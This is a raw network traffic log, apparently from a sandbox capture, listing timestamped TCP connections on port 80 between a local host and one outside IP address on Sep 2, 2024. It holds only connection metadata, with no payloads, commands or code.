                                                            Sep 2, 2024 13:34:41.329431057 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.636584044 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.724349976 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.762834072 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.884135008 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.887115955 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.887115955 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.891997099 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.892293930 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.892365932 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.892518044 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.896557093 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.897381067 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.928366899 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.933273077 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.933353901 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.933526993 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:41.938983917 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.247843027 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.252873898 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.319852114 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.324736118 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.324789047 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.562072992 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.582245111 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.618484974 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.694101095 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.769830942 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.800107956 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.848208904 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.848453045 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.849780083 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.853441954 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.853494883 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.853794098 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.853832960 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.854757071 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.854818106 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.855070114 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.859950066 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.212337971 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.217206001 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.511909962 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.588321924 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.727143049 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.792279005 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.863555908 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.864727020 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.868715048 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.868805885 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.870003939 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.870091915 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.870357990 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.875257969 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.228072882 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.232899904 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639075041 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639733076 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639842033 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.773196936 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.774651051 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.778419018 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.778476954 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.779483080 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.779553890 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.779737949 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.784527063 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.134491920 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.139425993 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.424245119 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.549455881 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.549552917 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.708291054 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.710125923 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.713881969 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.630213022 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.635024071 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.977963924 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.193582058 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.237993002 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.431005001 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.484188080 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.618509054 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.642374992 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.643387079 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.844603062 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.844672918 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.846612930 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.846702099 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.846746922 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:06.846908092 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.846919060 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:06.851723909 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.196739912 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.201963902 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.495337963 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.587307930 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.705408096 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.861373901 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.899415016 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.904946089 CEST804983780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.905008078 CEST4983780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.936453104 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.941385984 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:07.941447020 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.941667080 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:07.946398020 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:08.290469885 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:08.295511007 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.551203966 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.551887035 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.551948071 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.552232027 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.552356958 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.552879095 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.552953959 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.553584099 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.553646088 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.684171915 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.685951948 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.689590931 CEST804983880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.689646959 CEST4983880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.690793991 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:09.690854073 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.691390038 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:09.696216106 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.040709972 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.046092987 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.333755970 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.384166002 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.538333893 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.587308884 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.674751043 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.675649881 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.679981947 CEST804983980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.680042028 CEST4983980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.680486917 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.680556059 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.680849075 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.685560942 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.739716053 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.744658947 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:10.744740963 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.745142937 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:10.749929905 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.038419962 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.043497086 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.103883028 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.108675957 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.108844042 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.354198933 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.393393993 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.475699902 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.486713886 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.524758101 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.587268114 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.617532015 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.627774954 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.627918005 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.633682966 CEST804984080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.633692980 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.633747101 CEST4984080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.828557014 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:11.837337971 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:11.842232943 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:12.127609968 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:12.227932930 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.623320103 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.624476910 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.628731966 CEST804984180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:12.628849030 CEST4984180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.629360914 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:12.629487991 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.629678965 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.634500027 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:12.980429888 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:12.985383987 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.493069887 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.494105101 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.494153023 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.494215965 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.494256973 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.654221058 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.655643940 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.659351110 CEST804984280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.659399986 CEST4984280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.660476923 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:13.660536051 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.660851002 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:13.665669918 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.009232044 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.014077902 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.334122896 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.431015968 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.465325117 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.600562096 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.600563049 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.605442047 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.605619907 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.605779886 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.605802059 CEST804984380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:14.605865002 CEST4984380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:14.610611916 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.133904934 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.139070988 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.250412941 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.415400982 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.472609043 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.524840117 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.668508053 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.669817924 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.673754930 CEST804984480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.673810005 CEST4984480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.674746990 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:15.674808025 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.674933910 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:15.680620909 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.056510925 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.061388969 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.332412004 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.457170010 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.457495928 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.807349920 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.808240891 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.812581062 CEST804984580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.812889099 CEST4984580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.813096046 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.813177109 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.818592072 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.823432922 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.832617044 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.837455988 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:16.837553024 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.840890884 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:16.845655918 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.165730953 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.170726061 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.170787096 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.197552919 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.202447891 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.351978064 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.352041960 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.464828968 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.492552042 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.593772888 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.593940973 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.618711948 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.618765116 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.763223886 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.763552904 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.764308929 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.768584967 CEST804984680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.768671989 CEST4984680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.768866062 CEST804984780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.768950939 CEST4984780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.769139051 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:17.769387960 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.769516945 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:17.774920940 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.118599892 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.123444080 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.417937040 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.477905989 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.541320086 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.587281942 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.661469936 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.662518978 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.672053099 CEST804984880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.672116995 CEST4984880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.673401117 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:18.675995111 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.676398993 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:18.685755014 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.025219917 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.032900095 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.343343019 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.431027889 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.473081112 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.606106043 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.607429028 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.611193895 CEST804984980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.611255884 CEST4984980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.612413883 CEST804985080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.612484932 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.612816095 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.617681026 CEST804985080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:19.962734938 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:19.967617989 CEST804985080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:20.259644985 CEST804985080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:20.384386063 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:20.385696888 CEST804985080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:20.504805088 CEST4985080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:20.508507013 CEST4985180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.444030046 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.448535919 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.448622942 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.448831081 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.448914051 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.451905012 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.456749916 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.806154966 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.811109066 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.094038963 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.274801970 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.298681974 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.384202003 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.411753893 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.411758900 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.416806936 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.417220116 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.418363094 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.418365002 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.420145035 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.425118923 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.778358936 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.783301115 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.063173056 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.186348915 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.189219952 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.303591013 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.304267883 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.308790922 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.308852911 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.309030056 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.309083939 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.309196949 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.313983917 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.674917936 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.679868937 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.982764006 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.088299990 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.114883900 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.252813101 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.256516933 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.258327007 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.258409977 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.260684967 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.262222052 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.262372017 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.262665987 CEST4987580192.168.2.680.211.144.156
